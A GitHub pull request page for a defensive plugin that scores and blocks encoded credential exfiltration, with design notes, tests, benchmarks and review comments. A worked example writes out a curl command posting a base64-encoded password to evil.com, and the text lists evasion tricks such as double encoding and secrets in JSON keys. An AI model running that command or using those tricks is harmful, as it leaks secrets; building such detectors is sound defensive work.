Skip to content

feat(encoded-exfil): test, harden, and document encoded exfiltration detection plugin#3906

Merged
crivetimihai merged 12 commits intomainfrom
feat/encoded-exfil-hardening
Mar 30, 2026
Merged

feat(encoded-exfil): test, harden, and document encoded exfiltration detection plugin#3906
crivetimihai merged 12 commits intomainfrom
feat/encoded-exfil-hardening

Conversation

@gandhipratik203
Copy link
Copy Markdown
Collaborator

@gandhipratik203 gandhipratik203 commented Mar 29, 2026

Summary

Hardens the encoded exfiltration detection plugin (plugins/encoded_exfil_detection/) to production quality for WXO integration, following a test-driven development approach. All new features are implemented in both Python and Rust with full parity.

The plugin detects suspicious encoded payloads (base64, base64url, hex, percent-encoding, hex escapes) in prompt arguments, tool outputs, and resource content, then blocks or redacts based on a multi-factor suspicion scoring system. It uses Rust acceleration automatically when the encoded_exfil_detection_rust wheel is installed (4.3x–12.1x speedup), otherwise falling back to a pure Python implementation with identical behavior.

This PR closes 10 gaps identified during a thorough gap analysis against the PII filter and secrets detection sibling plugins. It adds allowlisting, configurable keyword/egress lists, nested multi-layer encoding detection, per-encoding thresholds, JSON-within-strings parsing, a resource_post_fetch hook, container recursion depth limiting, and detection logging — all in both Python and Rust. It also adds 112 TDD tests, a full README rewrite, and a Python-vs-Rust performance comparison script.


Gaps closed

Python plugin

Gap 1 (HIGH) — No allowlisting: legitimate base64 in production (JWTs, image data URIs, git SHAs) would cause constant false positives, leading ops teams to disable the plugin. Fixed by adding allowlist_patterns: list[str] to config — regex patterns validated via Pydantic field_validator, compiled once at config creation via model_post_init, and checked before scoring in _scan_text. The PII filter sibling plugin uses the same pattern (whitelist_patterns).

Gap 2 (HIGH) — No per-encoding thresholds: hex encodings have significantly higher false-positive rates than percent-encoding or escaped hex, but a single min_suspicion_score applied to all encoding types. Fixed by adding per_encoding_score: Dict[str, int] to config. The threshold lookup in _evaluate_candidate now uses cfg.per_encoding_score.get(encoding, cfg.min_suspicion_score), falling back to the global threshold for unconfigured encodings. Operators can set e.g. {"hex": 5, "base64": 2} to apply stricter filtering to hex while keeping base64 sensitive.

Gap 3 (MEDIUM) — No resource_post_fetch hook: the secrets detection sibling plugin scans resources, but encoded exfil only covered prompts and tool outputs. An attacker could exfiltrate via encoded content in a resource response. Fixed by adding async def resource_post_fetch() following the same pattern as tool_post_invoke. Updated plugin-manifest.yaml and plugins/config.yaml to declare the new hook.

Gap 4 (MEDIUM) — Hardcoded keyword/egress lists: _SENSITIVE_KEYWORDS (14 entries) and _EGRESS_HINTS (12 entries) were baked into the code with no way to extend them for deployment-specific secrets (e.g., watsonx_api, ibm_cloud_key). Fixed by adding extra_sensitive_keywords: list[str] and extra_egress_hints: list[str] to config. Extras are pre-encoded/lowercased at config creation via model_post_init and merged with built-in defaults during scoring.

Gap 5 (MEDIUM) — No nested encoding detection: an attacker could double-encode a payload (base64(hex(secret))) and the scanner would only see the outer layer, which decodes to another encoded string with no sensitive keywords. Fixed by adding max_decode_depth: int (default 2, range 1-5). After evaluating a candidate, the scanner decodes it and re-scans the decoded text for additional encoded segments. If a nested finding scores higher than the outer finding, the nested finding replaces it. This catches multi-layer obfuscation while respecting the depth limit.

Gap 6 (MEDIUM) — No JSON-within-strings parsing: a string value containing JSON (e.g., '{"secret": "base64..."}') was scanned as flat text. The scanner could find encoded segments in the raw text, but would not recurse into the JSON structure to find segments at deeper nesting levels. Fixed by adding parse_json_strings: bool (default true). After scanning a string, if it parses as a JSON dict or list, the plugin recurses into the parsed structure. Respects max_recursion_depth to prevent abuse.

Gap 7 (LOW) — No container recursion depth limit: deeply nested dicts/lists could cause unbounded recursion. Fixed by adding max_recursion_depth: int (default 32, range 1-1000) to _scan_container. Recursion returns early when the depth limit is exceeded.

Gap 8 (LOW) — No detection logging: when findings were detected, nothing was logged. The PII filter sibling plugin has log_detections. Fixed by adding log_detections: bool (default true) and a _log_detection() method that emits logger.warning with hook name, count, encoding types, and request ID — never decoded payload content.

Rust implementation

Gap 9 (HIGH) — Rust lacked all new features: allowlisting, configurable keywords/egress, nested detection, per-encoding thresholds, JSON-within-strings parsing, and recursion depth were only in Python. Any deployment using Rust acceleration (the default when the wheel is installed) would silently lack these features. Fixed by porting all features to plugins_rust/encoded_exfil_detection/src/lib.rs:

  • allowlist_patterns: Vec<Regex> compiled from Python config strings with explicit PyValueError on invalid regex (matching Python validation behavior)
  • extra_sensitive_keywords: Vec<Vec<u8>> and extra_egress_hints: Vec<String> merged with built-in constants
  • Nested decoding in scan_text with decode_depth parameter, same best-score-wins logic as Python
  • per_encoding_score: HashMap<String, u32> with same threshold lookup as Python
  • JSON-within-strings via serde_json::from_str + json_value_to_py converter for recursive scanning
  • max_recursion_depth counter in scan_container
  • 3 new Rust unit tests: test_nested_base64_detection, test_allowlist_skips_matching_candidate, test_extra_sensitive_keywords

Gap 10 (HIGH) — No Python-vs-Rust performance comparison script: all four other Rust plugins (rate_limiter, pii_filter, secrets_detection, url_reputation) have compare_performance.py but encoded exfil did not. Fixed by creating plugins_rust/encoded_exfil_detection/compare_performance.py with latency mode (per-call timing, 7 scenarios), throughput mode (async concurrency at 1/4/16/64 tasks), and parity smoke tests before each benchmark.

Gap 11 (MEDIUM) — Per-call config parsing overhead in Rust: the Rust entry point was a bare function (py_scan_container) that re-parsed the Python config object via 15 .getattr() calls on every request — including recompiling allowlist regexes, re-encoding keywords to bytes, and re-lowercasing egress hints. The rate limiter Rust plugin avoids this with a persistent RateLimiterEngine class that parses config once at __new__(). Fixed by creating #[pyclass] ExfilDetectorEngine with __new__() (parses config once) and scan() (reuses pre-parsed config). The Python plugin creates the engine at __init__ and calls self._rust_engine.scan(container) on each hook. The bare py_scan_container() function is kept as a backward-compatible wrapper. Result: clean payload speedup improved from 2.4x to 4.3x, small payload from 3.7x to 4.7x.


Additional hardening

  • Config pre-compilation at creation — allowlist regexes, encoded keywords, and lowercased hints are compiled/pre-processed once in model_post_init (Python) and __new__() (Rust), not on every scan call. Previous implementation re-compiled on every direct _scan_container call.
  • Wasteful allocation eliminated — nested detection dict copy ({**nf, "start": ..., "end": ...}) moved inside the conditional, only allocating when the finding will actually be used.
  • Rust regex validation matches Python — Rust now returns PyValueError for invalid allowlist regex patterns instead of silently dropping them via filter_map(|p| Regex::new(&p).ok()). Both implementations now reject bad patterns at config time.
  • Unused imports cleaned — ruff-flagged unused imports (PromptPrehookPayload, PluginMode, ResourcePostFetchResult) removed from test files.
  • Pydantic v2 deprecation fixed — replaced class Config: underscore_attrs_are_private = True with model_config = {"ignored_types": (re.Pattern,)} to silence Pydantic v2 deprecation warning.
  • Plugin version bumped0.1.00.2.0 in both plugin-manifest.yaml and plugins/config.yaml.
  • Docstring coverage verified — 100% interrogate coverage on the plugin directory (21/21).

Architecture

The plugin uses optional Rust acceleration with automatic Python fallback:

  • Python owns plugin lifecycle, hook integration (prompt_pre_fetch, tool_post_invoke, resource_post_fetch), and result construction (PluginViolation, PluginResult)
  • Rust owns the hot path: regex matching, decoding, scoring, allowlist checking, nested decoding, JSON parsing, and redaction
  • Both implementations share identical logic and produce identical results (verified by parity tests)
Plugin architecture: hook integration, Rust/Python dispatch, and result handling
┌──────────────────────────────────────────────────────────────────────┐
│                   EncodedExfilDetectorPlugin                         │
│                                                                      │
│  Hooks:  prompt_pre_fetch      tool_post_invoke    resource_post_    │
│          (prompt args)         (tool output)       fetch (resource)  │
└─────────────────────────────┬────────────────────────────────────────┘
                              │
                              │  Python responsibilities:
                              │  - validate config (at init)
                              │  - pre-compile allowlist, keywords, hints (at init)
                              │  - extract container from payload
                              │  - dispatch to Rust or Python scanner
                              │  - construct PluginViolation / PluginResult
                              ▼
┌──────────────────────────────────────────────────────────────────────┐
│                        _scan(container)                              │
│                                                                      │
│    ┌──────────────────────┐       ┌──────────────────────────┐      │
│    │  Rust available?     │──YES──│  py_scan_container()     │      │
│    │  (wheel installed)   │       │  Rust hot path:          │      │
│    └──────────┬───────────┘       │  - pre-compiled regexes  │      │
│               │ NO                │  - zero-copy scanning    │      │
│               ▼                   │  - serde_json parsing    │      │
│    ┌──────────────────────┐       │  - 4.3x–12.1x faster    │      │
│    │  _scan_container()   │       └──────────────────────────┘      │
│    │  Python fallback:    │                                          │
│    │  - identical logic   │       Both paths produce identical       │
│    │  - json.loads()      │       results (verified by parity tests) │
│    └──────────────────────┘                                          │
└─────────────────────────────┬────────────────────────────────────────┘
                              │
                              ▼
┌──────────────────────────────────────────────────────────────────────┐
│                        Result Handling                                │
│                                                                      │
│    count ≥ min_findings_to_block AND block_on_detection?             │
│    ├── YES → PluginViolation(code="ENCODED_EXFIL_DETECTED")         │
│    │                                                                 │
│    redact enabled AND content changed?                               │
│    ├── YES → modified_payload with redacted text + metadata          │
│    │                                                                 │
│    └── otherwise → metadata only (count, findings, implementation)   │
└──────────────────────────────────────────────────────────────────────┘
Detection pipeline: what happens inside scan_text for each string
┌─────────────────────────────────────────────────────────────────┐
│  scan_text(text, cfg, decode_depth)                             │
│                                                                  │
│  For each of 5 encoding patterns (base64, base64url, hex,       │
│  percent_encoding, escaped_hex):                                 │
│                                                                  │
│  ┌────────────────┐   ┌────────────────┐   ┌────────────────┐  │
│  │ 1. REGEX MATCH │──▶│ 2. ALLOWLIST   │──▶│ 3. DECODE      │  │
│  │                │   │    CHECK       │   │                │  │
│  │ Find candidate │   │ Skip if regex  │   │ base64 → bytes │  │
│  │ segments in    │   │ matches any    │   │ hex → bytes    │  │
│  │ the text       │   │ allowlist      │   │ etc.           │  │
│  │                │   │ pattern        │   │ Failed → skip  │  │
│  └────────────────┘   └────────────────┘   └───────┬────────┘  │
│                                                     │           │
│                                                     ▼           │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │ 4. SCORE (max 7 points)                                  │   │
│  │                                                           │   │
│  │  +1  decodable           (always, if decode succeeded)    │   │
│  │  +1  high entropy        (Shannon entropy ≥ 3.3)          │   │
│  │  +1  printable payload   (≥ 70% printable ASCII)          │   │
│  │  +2  sensitive keywords  (password, token, api_key, ...)  │   │
│  │  +1  egress context      (curl, webhook, upload, ...)     │   │
│  │  +1  long segment        (≥ 2× min_encoded_length)        │   │
│  └──────────────────────────────────┬───────────────────────┘   │
│                                     │                           │
│                                     ▼                           │
│  ┌────────────────────┐   ┌────────────────────────────────┐   │
│  │ 5. THRESHOLD CHECK │   │ 6. NESTED DECODE               │   │
│  │                    │   │    (if below threshold)         │   │
│  │ score ≥ per-       │   │                                │   │
│  │ encoding threshold │   │ Decode candidate text,          │   │
│  │ or global          │   │ re-scan for inner encodings.    │   │
│  │ min_suspicion_     │   │ If inner score > outer score,   │   │
│  │ score?             │   │ use inner finding.              │   │
│  │                    │   │ Depth limited by                │   │
│  │ YES → finding      │   │ max_decode_depth.               │   │
│  │ recorded           │   │                                │   │
│  └────────────────────┘   └────────────────────────────────┘   │
│                                                                  │
│  After all patterns scanned:                                     │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │ 7. JSON-WITHIN-STRINGS                                    │   │
│  │                                                           │   │
│  │  Is the string valid JSON (dict or list)?                 │   │
│  │  YES → parse with json.loads / serde_json                 │   │
│  │       → recurse into parsed structure                     │   │
│  │       → merge additional findings                         │   │
│  │  NO  → continue                                           │   │
│  └──────────────────────────────────────────────────────────┘   │
│                                                                  │
│  Return: (redacted_text, findings)                               │
└─────────────────────────────────────────────────────────────────┘
Scoring worked example: base64 credential near egress context
Input text:
┌─────────────────────────────────────────────────────────────────┐
│ curl -d 'cGFzc3dvcmQ9c3VwZXItc2VjcmV0LXRva2Vu' https://evil.com │
└─────────────────────────────────────────────────────────────────┘
              ▲                                          ▲
              │ egress context: "curl"                   │ egress context: "https://"

Step 1 — Regex matches base64 candidate:
              cGFzc3dvcmQ9c3VwZXItc2VjcmV0LXRva2Vu

Step 2 — Allowlist check: no match → continue

Step 3 — Decode base64:
┌─────────────────────────────────────────┐
│ password=super-secret-token             │
└─────────────────────────────────────────┘

Step 4 — Score:
┌───────────────────────────────────────────────────┐
│  +1  decodable           ✓ decoded successfully   │
│  +1  high_entropy        ✓ entropy 3.8 ≥ 3.3     │
│  +1  printable_payload   ✓ 100% printable ≥ 70%  │
│  +2  sensitive_keywords  ✓ "password" found       │
│  +1  egress_context      ✓ "curl", "https://"     │
│  +1  long_segment        ✓ 52 chars ≥ 48          │
│  ─────────────────────────────────────────────    │
│   7  TOTAL                                        │
└───────────────────────────────────────────────────┘

Step 5 — Threshold check: 7 ≥ 3 (default) → FINDING RECORDED

Result:
┌─────────────────────────────────────────────────────┐
│  PluginViolation                                     │
│    code: "ENCODED_EXFIL_DETECTED"                    │
│    details:                                          │
│      count: 1                                        │
│      examples: [{encoding: "base64", score: 7, ...}] │
│      implementation: "Rust"                          │
└─────────────────────────────────────────────────────┘

Test results

Test results summary

Scope Result
Encoded exfil plugin (full, Rust path) 112 passed, 2 xfailed
Integration tests 4 passed
Rust cargo test 7 passed
Interrogate docstring coverage 100% (21/21)
Ruff lint Clean
Bandit security scan No issues

1. Unit test breakdown

Full test group results (12 groups, 112 tests)
Group Tests Status What it validates
A — Config validation 6 passed Pydantic rejects invalid values (min_entropy < 0, ratio > 1.0, etc.)
B — Allowlisting 4 passed Allowlisted patterns skipped, non-allowlisted flagged, invalid regex rejected
C — Configurable keywords 3 passed Extra keywords/hints trigger detection, defaults still work
D — resource_post_fetch hook 3 passed Resource blocking, clean passthrough, redaction
E — Functionality gaps 6 passed block_on_detection=false metadata, None args, min_findings_to_block
F — Bypass resistance 6 passed Mixed-case hex, boundary lengths, padding, split payloads, long segment
G — Edge cases 5 passed max_scan_string_length boundary, all encodings disabled, non-container types
H — Error handling 3 passed Invalid config raises, None input safe, logs don't leak secrets
I — Rust/Python parity 3 passed Identical counts, scores, encodings, redacted output between paths
J — Integration 4 passed Plugin loads, end-to-end block, coexistence, clean passthrough
K — Nested encoding 3 passed Double-encoded base64, depth limiting, hex-wrapped base64
L — Documented limitations 5 3 passed, 2 xfailed Per-encoding thresholds ✓, JSON-in-strings ✓, malformed JSON ✓; cross-request ✗, custom patterns ✗

2. Rust unit tests

Full Rust test results (7 tests)
test tests::test_scan_text_detects_base64_sensitive_payload ... ok
test tests::test_scan_text_redacts_when_enabled ... ok
test tests::test_scan_text_ignores_short_candidates ... ok
test tests::test_scan_text_detects_adjacent_matches ... ok
test tests::test_nested_base64_detection ... ok
test tests::test_allowlist_skips_matching_candidate ... ok
test tests::test_extra_sensitive_keywords ... ok

test result: ok. 7 passed; 0 failed; 0 ignored

3. Python vs Rust performance comparison

Full benchmark results (Apple Silicon, release build, 200 iterations)

Parity smoke tests pass for all 7 scenarios before benchmarking.

Scenario Python Rust Speedup
1 base64 finding (prompt hook) 0.035ms 0.007ms 4.7x
1 base64 finding (tool hook) 0.033ms 0.008ms 4.3x
5 mixed findings (prompt hook) 0.106ms 0.018ms 5.7x
20+ mixed findings (tool hook) 0.662ms 0.086ms 7.7x
Clean payload (prompt hook) 0.014ms 0.003ms 4.3x
Clean payload (tool hook) 0.012ms 0.003ms 4.0x
~50KB text, 2 findings (tool hook) 1.432ms 0.118ms 12.1x

Rust speedup scales with payload size: 4.3x on clean payloads (improved from 2.4x after the persistent engine refactor eliminated per-call config parsing), up to 12.1x on large text where pre-compiled static regexes, fixed-size entropy arrays, and zero-copy string processing provide the largest advantage.


Limitations

Cross-request correlation is not tracked
The plugin is stateless. An attacker splitting a credential across multiple requests (slow exfil) will not be detected. This is a separate system concern — it requires stateful storage across requests (Redis, decay windows, reassembly logic) that is fundamentally different from a plugin's scan-per-request model. Documented as an xfail test.

Custom encoding patterns are not supported
Only the 5 built-in encoding types (base64, base64url, hex, percent-encoding, escaped hex) are available. User-defined regex patterns are not accepted because user-supplied regexes can cause ReDoS (catastrophic backtracking). The 5 built-in types cover the vast majority of real-world encoding-based exfiltration attempts. Documented as an xfail test.

JSON-within-strings adds overhead
Every string value gets a json.loads() / serde_json::from_str() attempt. On clean payloads (majority of traffic), this is a failed parse on every string (~1-3 microseconds). The parse_json_strings: false flag allows operators to disable this if the overhead is unacceptable.

Nested detection adds scan overhead
With max_decode_depth=2 (default), every candidate that decodes successfully but scores below threshold triggers a re-scan of the decoded text. For payloads with many decodable-but-innocent segments, this increases scan time. Setting max_decode_depth=1 disables nested detection.

Allowlist patterns match the encoded form, not decoded content
The allowlist regex is tested against each raw encoded candidate string before decoding. This means patterns must match the encoded form (e.g., the base64 prefix of a JWT), not the decoded content. This is intentional — matching decoded content would require decoding first, defeating the purpose of skipping known-good patterns early.

Not validated on OpenShift
All testing was performed locally and in CI. The plugin has not been tested on an OpenShift cluster, which is the target production environment.

Closes #3807.

@gandhipratik203 gandhipratik203 changed the base branch from feat/rate-limiter-rust to main March 29, 2026 00:09
@gandhipratik203 gandhipratik203 changed the title feat(encoded-exfil): harden plugin for production — TDD, Rust parity, nested detection feat(encoded-exfil): harden plugin for production, Rust parity, nested detection Mar 29, 2026
@gandhipratik203 gandhipratik203 self-assigned this Mar 29, 2026
@gandhipratik203 gandhipratik203 changed the title feat(encoded-exfil): harden plugin for production, Rust parity, nested detection feat(encoded-exfil): production-ready encoded exfiltration detection with full Rust parity Mar 29, 2026
@gandhipratik203 gandhipratik203 force-pushed the feat/encoded-exfil-hardening branch 2 times, most recently from 5d7ba49 to 2f54db3 Compare March 29, 2026 12:36
@crivetimihai crivetimihai added enhancement New feature or request COULD P3: Nice-to-have features with minimal impact if left out; included if time permits plugins security Improves security labels Mar 29, 2026
@crivetimihai crivetimihai added this to the Release 1.0.0 milestone Mar 29, 2026
@crivetimihai
Copy link
Copy Markdown
Member

Thanks @gandhipratik203. Will review the detection improvements and Rust parity implementation.

@gandhipratik203 gandhipratik203 force-pushed the feat/encoded-exfil-hardening branch 4 times, most recently from 1a31311 to 2cfc137 Compare March 29, 2026 16:42
@gandhipratik203 gandhipratik203 changed the title feat(encoded-exfil): production-ready encoded exfiltration detection with full Rust parity feat(encoded-exfil): test, harden, and document encoded exfiltration detection plugin Mar 29, 2026
@gandhipratik203 gandhipratik203 added wxo wxo integration release-fix Critical bugfix required for the release and removed COULD P3: Nice-to-have features with minimal impact if left out; included if time permits labels Mar 30, 2026
Copy link
Copy Markdown
Collaborator Author

@gandhipratik203 gandhipratik203 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hi @lucarlig , thanks for the detailed review — really appreciate you testing with a concrete payload and catching the double-counting issue.

Addressed in this push:

  • Double-counting — Great catch. When a string is valid JSON, we now scan only the parsed structure and skip the raw text scan entirely, so a single secret produces exactly one finding. Added a regression test for this.

  • JSON bypasses oversized-input guard — Good point. Added a size check (len <= max_scan_string_length) and a quick heuristic (string must start with { or [) before attempting JSON parse. Applied to both Python and Rust.

  • Rust path test coverage — Fair feedback. Added 8 new parametrized tests covering per-encoding thresholds, JSON parsing, heuristic skip, and malformed JSON on both Python and Rust paths.

  • README inconsistencies — Fixed. Corrected the wheel name to mcpgateway-encoded-exfil-detection, removed JSON-within-strings and per-encoding thresholds from Known Limitations (since they're now implemented), and added a Performance section with benchmark results.

Noted for follow-up:

  • Double decode in nested scan — Agree this is an optimization opportunity. In practice the cost is microseconds per candidate (Rust path: ~0.007ms per finding) so it doesn't show up in benchmarks today. Happy to optimize if profiling surfaces it as a bottleneck.

  • JSON FFI allocation churn — The serde_json → Python object conversion is inherent to the recursive approach. It's now bounded by both max_recursion_depth and the new max_scan_string_length guard on JSON parsing. Happy to revisit if large embedded JSON becomes a concern in production.

Copy link
Copy Markdown
Collaborator

@lucarlig lucarlig left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

  1. JSON-string parsing introduces a real Rust-path bypass for secrets embedded in JSON object keys. Once the string is parsed, the Rust scanner only traverses values and never scans keys, so a payload like {"<base64-secret>":"x"} is missed.

  2. the Rust JSON-string path can change a clean string payload into a structured object even with no findings. scan_container() parses the string, converts the JSON tree back into Python objects with json_value_to_py(), and returns that structure instead of the original string. In hook flows, that can surface as a payload mutation purely because JSON parsing happened.

@gandhipratik203
Copy link
Copy Markdown
Collaborator Author

Hi Dima, thanks for the thorough review and the positive feedback on the test coverage and documentation.

Already addressed (before your review):

Addressed now:

  • Allowlist edge cases (missing test) — Added a partial match test confirming that a substring-matching allowlist pattern correctly suppresses the candidate.

  • Rust = boundary validation (Open Source release of MCP Context Forge - MCP Gateway #2) — The current behavior is correct: = is excluded from boundary checks because it's a common separator before base64 (data=cGFzc3dvcmQ9...) and the regex already captures trailing = padding as part of the match. Cleaned up the implementation to compute the boundary chars once instead of twice per call.

Deferring:

  • Nested decoding recursion budget (Configure Renovate #1) — With max_decode_depth=2 (default) and max_findings_per_value=50, the worst case is already bounded. Happy to add a global scan counter if profiling shows it's needed.

  • Concurrent scanning test — The plugin is stateless per call with no shared mutable state, so thread safety is guaranteed by design.

  • Large payload performance test — Already covered by test_max_scan_string_length_exact_boundary_not_skipped in the edge cases group.

@gandhipratik203
Copy link
Copy Markdown
Collaborator Author

Hi @lucarlig, thanks for the follow-up — good catches both.

Fixed:

  • JSON keys not scanned — Dict keys are now scanned as strings when len(key) >= min_encoded_length. A payload like {"<base64-secret>": "x"} is now detected. Applied to both Python and Rust dict traversal, with findings tagged with a (key) path suffix. Added test.

  • JSON type mutation — Changed the approach: we now scan the raw text first (preserving the original string type), then parse JSON for additional findings only. Duplicates are filtered by match preview. The return value is always the original string — no more type conversion from str to dict. Added test verifying return type preservation.

lucarlig
lucarlig previously approved these changes Mar 30, 2026
dima-zakharov
dima-zakharov previously approved these changes Mar 30, 2026
Copy link
Copy Markdown
Collaborator

@dima-zakharov dima-zakharov left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Commit Review: afab86f

Commit: afab86f24bd580045f3596860cbbb03c28bc20bb
Author: Pratik Gandhi
Date: March 30, 2026
Title: fix(encoded-exfil): scan dict keys for encoded secrets, prevent JSON type mutation


Summary

This commit addresses two important issues in the encoded exfiltration detection plugin:

  1. Dict Key Scanning: Adds detection of encoded secrets used as JSON object keys
  2. JSON Type Mutation Prevention: Fixes a bug where JSON-within-strings scanning could mutate the return type from string to dict/list

Files Changed: 4
Lines Changed: +91, -30


Verdict: ✅ Approve

Well-structured fix with comprehensive tests. Addresses real security gaps and type safety issues.


Changes Reviewed

1. Python Implementation (encoded_exfil_detector.py)

Change A: JSON Type Mutation Prevention (Lines 420-447)

Before:

if isinstance(container, str):
    # Try parsing string as JSON first — scan parsed structure only
    if cfg.parse_json_strings and ...:
        parsed = json.loads(container)
        if isinstance(parsed, (dict, list)):
            return _scan_container(parsed, cfg, path=json_path, ...)  # ❌ Returns dict/list
    redacted, findings = _scan_text(container, cfg, path=path)
    return len(findings), redacted, findings

After:

if isinstance(container, str):
    # Scan as raw text first — always returns the original type (string)
    redacted, findings = _scan_text(container, cfg, path=path)
    
    # Try parsing string as JSON for additional findings (metadata only, no type mutation)
    if cfg.parse_json_strings and ...:
        try:
            parsed = json.loads(container)
            if isinstance(parsed, (dict, list)):
                _, _, json_findings = _scan_container(parsed, cfg, path=json_path, ...)
                # Deduplicate: only add JSON findings whose encoded match isn't already found
                raw_matches = {f.get("match") for f in findings}
                for jf in json_findings:
                    if jf.get("match") not in raw_matches:
                        findings.append(jf)
        except (json.JSONDecodeError, ValueError):
            pass
    return len(findings), redacted, findings  # ✅ Always returns string

Assessment:Correct

  • Type Safety: String input now always returns string output (critical for plugin contract)
  • Additive Scanning: JSON parsing is now findings-only, not transformative
  • Deduplication: Match preview comparison prevents double-counting
  • Performance: JSON heuristic check (startswith('{') or startswith('[')) already exists from previous commit

Change B: Dict Key Scanning (Lines 451-457)

Added:

for key, value in container.items():
    child_path = f"{path}.{key}" if path else str(key)
    
    # Scan keys that are long enough to contain encoded content
    if isinstance(key, str) and len(key) >= cfg.min_encoded_length:
        key_path = f"{child_path}(key)"
        _, key_findings = _scan_text(key, cfg, path=key_path)
        findings.extend(key_findings)
        total += len(key_findings)
        
    count, new_value, child_findings = _scan_container(value, cfg, path=child_path, ...)

Assessment:Correct

  • Security: Detects encoded secrets used as JSON keys (e.g., {"cGFzc3dvcmQ9c2VjcmV0": "value"})
  • Performance: Only scans keys meeting min_encoded_length threshold
  • Path Annotation: (key) suffix clearly identifies key-based findings
  • Symmetry: Matches value scanning logic

Security Impact: 🔴 High - Closes evasion vector where attackers hide encoded secrets in JSON keys


2. Rust Implementation (lib.rs)

Change: Mirrors Python Logic

The Rust implementation correctly mirrors the Python changes:

// Scan as raw text first
let (redacted_text, findings) = scan_text(&text, path, cfg, 0);
let findings_list = PyList::empty(py);
for finding in &findings {
    findings_list.append(finding_to_dict(py, finding)?)?;
}

// Try parsing string as JSON for additional findings
if cfg.parse_json_strings && ... {
    let (_, _, json_findings) = scan_container(py, &py_parsed, &json_path, cfg, depth + 1)?;
    
    // Deduplicate using HashSet for O(1) lookup
    let raw_matches: std::collections::HashSet<String> =
        findings.iter().map(|f| f.matched_preview.clone()).collect();
    for item in json_findings.iter() {
        if let Ok(dict) = item.cast::<PyDict>() {
            let preview = dict.get_item("match")...;
            if !raw_matches.contains(&preview) {
                findings_list.append(item)?;
            }
        }
    }
}

// Dict key scanning
for (key, value) in dict.iter() {
    let key_str = key.str()?.to_string_lossy().into_owned();
    
    // Scan keys that are long enough to contain encoded content
    if key_str.len() >= cfg.min_encoded_length {
        let key_path = format!("{}(key)", child_path);
        let (_, key_findings) = scan_text(&key_str, &key_path, cfg, 0);
        // ... add findings ...
    }
}

Assessment:Correct

  • Uses HashSet<String> for efficient O(1) deduplication lookup
  • Properly handles PyO3 type conversions
  • Returns PyString to preserve original type
  • Dict key scanning logic matches Python implementation

3. Test Coverage (test_encoded_exfil_detector.py)

New Test 1: Type Preservation

def test_json_string_returns_string_not_dict(self, use_rust: bool):
    """JSON-parsed strings must return the original string type, not a parsed dict."""
    json_str = json.dumps({"key": "clean value"})
    cfg = EncodedExfilDetectorConfig(parse_json_strings=True)
    payload = {"data": json_str}

    _, result, _ = _scan_container(payload, cfg, use_rust=use_rust)
    # The "data" value must still be a string, not a parsed dict
    assert isinstance(result["data"], str), f"Expected str but got {type(result['data'])}"

Assessment:Correct - Validates type preservation contract


New Test 2: Dict Key Detection

def test_encoded_secret_in_dict_key_detected(self, use_rust: bool):
    """Encoded secrets used as dict keys should be detected."""
    encoded_key = base64.b64encode(b"password=super-secret-credential-value").decode()
    cfg = EncodedExfilDetectorConfig(min_suspicion_score=1)
    payload = {encoded_key: "some value"}

    count, _, findings = _scan_container(payload, cfg, use_rust=use_rust)
    assert count >= 1, "Encoded secret in dict key should be detected"
    assert any("key" in f.get("path", "") for f in findings), "Finding path should contain 'key'"

Assessment:Correct - Validates key scanning functionality


Updated Test: JSON Heuristic

def test_json_within_string_detection(self, use_rust: bool):
    """JSON embedded in string should be scanned with precise paths."""
    json_str = json.dumps({"password": "secret-value"})
    cfg = EncodedExfilDetectorConfig(min_suspicion_score=1, parse_json_strings=True)
    payload = {"data": json_str}

    count, result, findings = _scan_container(payload, cfg, use_rust=use_rust)
    assert count == 1
    # Return type must be string (no type mutation)
    assert isinstance(result["data"], str), f"Expected str but got {type(result['data'])}"

Assessment:Correct - Updated assertion validates type preservation


Findings

✅ Strengths

  1. Type Safety: Fixes critical type mutation bug that could break downstream plugins
  2. Security: Closes evasion vector via encoded JSON keys
  3. Deduplication: Smart match-preview comparison prevents double-counting
  4. Test Coverage: Both changes have dedicated tests with Python/Rust parity
  5. Performance: Key scanning gated by min_encoded_length threshold
  6. Symmetry: Python and Rust implementations are consistent

✅ No Issues Found

  • Logic is sound
  • Edge cases handled (non-string keys, JSON parse failures)
  • Type annotations correct
  • Test coverage comprehensive

Security Impact Assessment

Before This Commit

Attack Vector Detected?
Encoded secret in JSON value ✅ Yes
Encoded secret in JSON key No (evasion possible)
JSON string mutated to dict ⚠️ Bug (type safety issue)

After This Commit

Attack Vector Detected?
Encoded secret in JSON value ✅ Yes
Encoded secret in JSON key Yes (fixed)
JSON string mutated to dict Fixed (type preserved)

Recommended Actions

None Required

This commit is ready to merge as-is. The changes are:

  • ✅ Well-tested (Python + Rust parity)
  • ✅ Security-enhancing (closes evasion vector)
  • ✅ Bug-fixing (type mutation prevention)
  • ✅ Performance-safe (threshold-gated scanning)

Conclusion

✅ Approve

This is a high-quality fix that addresses both a security gap (encoded keys) and a type safety bug (JSON mutation). The implementation is clean, well-tested, and maintains Python/Rust parity.

Key Improvements:

  1. Encoded secrets in JSON keys are now detected
  2. String inputs always return string outputs (type contract preserved)
  3. Deduplication prevents double-counting across raw/JSON scans

Review generated by automated code review process.

gandhipratik203 and others added 11 commits March 30, 2026 21:00
…with full Rust parity

- Add allowlist_patterns config with regex validation to suppress false positives
- Add extra_sensitive_keywords and extra_egress_hints for configurable detection tuning
- Add nested encoding detection with max_decode_depth (peels base64-of-hex etc.)
- Add per_encoding_score for per-encoding suspicion thresholds
- Add parse_json_strings to detect encoded payloads inside JSON string values
- Add resource_post_fetch hook to scan fetched resources for exfiltration
- Add container recursion depth limiting (max_recursion_depth)
- Add detection logging (log_detections flag, no sensitive content in logs)
- Port all features to Rust with full parity via persistent ExfilDetectorEngine class
- Add compare_performance.py: Python vs Rust benchmarks (4.3x-12.1x speedup)
- Add 112 TDD tests: config validation, bypass resistance, parity, integration,
  nested encoding, JSON parsing, and xfail-documented limitations
- Full README rewrite with config reference, tuning guide, and worked examples

Closes #3807

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>
Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>
Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>
- Replace object.__setattr__() with setattr() to fix ruff PLC2801
- Rename unused __context to _context to fix vulture
- Run cargo fmt on Rust test code

